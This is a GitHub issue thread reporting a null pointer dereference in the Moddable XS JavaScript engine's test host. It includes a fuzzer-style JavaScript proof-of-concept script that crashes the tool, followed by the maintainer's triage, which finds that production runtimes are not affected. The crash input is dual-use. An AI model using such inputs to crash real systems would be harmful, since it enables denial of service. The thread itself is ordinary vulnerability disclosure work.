Moddable-OpenSource/moddable #380: null pointer dereference

rain6851, 2020-06-02:
# Enviroment
```
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
var width = 128;
var KHa5 = !4;
var cxeC = ~2147483648;
var XwES = Math;
var hZQt = Ball();
var height = 64;
var bCsy = !4294967297;
function Ball() {
    var JeMR = ~NaN;
    this.x = Math.floor(Math.random() * (width - this.radius + 4)) + this.radius;
    var HpAi = bounce();
    var MJJ8 = ~1.7976931348623157e+308;
    this.y = Math.floor(Math.random() * (width - this.radius + 4)) + this.radius;
    var TKxb = - -9007199254740994;
    var sfpa = ~-9007199254740991;
    var TKHM = +2147483649;
    var Pwrr = draw();
    var rcol = Math.floor(Math.random() * 3);
    var zSaR = +-9007199254740990;
    var Nhh5 = ~-9007199254740994;
    Ball();
}
cxeC = 100;
console = new Float32Array([
    1.3,
    1200,
    1200,
    4294967295,
    3
]);
width = new Map([
    [
        console,
        width,
        bCsy,
        numBalls,
        1.7976931348623157e+308,
        1.3,
        1.3,
        console,
        console,
        height,
        width,
        numBalls,
        1200,
        width,
        0.2,
        1e-15,
        bCsy,
        bCsy
    ],
    [
        numBalls,
        1.7976931348623157e+308,
        9007199254740991,
        height,
        bCsy,
        4294967297,
        bCsy,
        3,
        9007199254740992,
        bCsy,
        673720360,
        3037000498
    ]
]);
height = new WeakSet([
    [],
    [
        bCsy,
        NaN,
        -1,
        9007199254740994,
        1518500249,
        width,
        2147483649,
        width,
        bCsy,
        bCsy,
        4294967296,
        width,
        width
    ]
]);
var balls = new Array(numBalls);
var dmYE = draw();
for (i = 0; i < numBalls; i++) {
    balls[i] = new Ball();
}
function draw() {
    var canvas = document.getElementById('c}AZ#ht');
    var XCyk = new WeakMap([
        [
            null,
            null
        ],
        [
            null,
            null,
            null
        ]
    ]);
    if (canvas.getContext) {
        var ctx = canvas.getContext('2d');
        var Bhac = Math;
        var BYxi = !3037000498;
        ctx.globalAlpha = 0.5;
        var ikPQ = !3.141592653589793;
        for (i = 0; i < numBalls; i++) {
            var ball = balls[i];
            var zHxw = Math;
            bounce();
            ctx.fillStyle = ball.col;
            draw();
            var ssSw = -2147483647;
            if (ball.x <= ball.radius || ball.x >= width - ball.radius) {
                var bfre = - -2147483649;
            }
            if (ball.y <= ball.radius || ball.y >= height - ball.radius) {
                ball.dy *= -1;
                var cSHB = -153;
                Ball();
                Ball();
                draw();
            }
            ball.x += ball.dx;
            var BPKM = Math;
            var RfBW = !-2147483649;
            Ball();
            ctx.arc(ball.x, ball.y, ball.radius, 0, 2 * Math.PI, false);
            Ball();
            var rMat = !10000;
            var EDCf = - -9007199254740991;
            draw();
            var DsYn = Math;
            bounce();
            ctx.fill();
            var rtsK = bounce();
            JSON.stringify('NzVz7z>l_@s)7`3o3o,ViWjE');
        }
    } else {
    }
}
function bounce() {
    setInterval(draw, 10);
    bounce();
}
```
# vulnerability analysis

We can see that the program tries to access the memory area pointed to by `rbp+0x40`, but the value of `rbp is 0

[image]

[image]

rain6851, 2020-06-02:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-08-05:
The test script throws an error on this line because `this` is `undefined.

```
    this.x = Math.floor(Math.random() * (width - this.radius + 4)) + this.radius;
```

The crash occurs in the test host's handling of the exception.  While this is not desirable, it is not a vulnerability in the XS engine.

rain6851, 2020-08-05:
> The test script throws an error on this line because `this` is `undefined`.
>
> ```
>     this.x = Math.floor(Math.random() * (width - this.radius + 4)) + this.radius;
> ```
>
> The crash occurs in the test [...]

NO, NO, NO.  It conforms to the definition of null pointer dereference（https://cwe.mitre.org/data/definitions/476.html）. There fore, it is a vulnerability of null pointer dereference.

phoddie, 2020-08-05:
We are able to reproduce the problem. We will make an effort to resolve it. However, there is no security vulnerability to products built on XS from this issue as the code that performs the null dereference is not used in the production runtime.

rain6851, 2020-08-05:
> We are able to reproduce the problem. We will make an effort to resolve it. However, there is no security vulnerability to products built on XS from this issue as the code that performs the null dereference is not used in the production runtime.

I understand what you mean, the null pointer dereference vulnerability is indeed not a serious problem.

closed 2020-09-03 by phoddie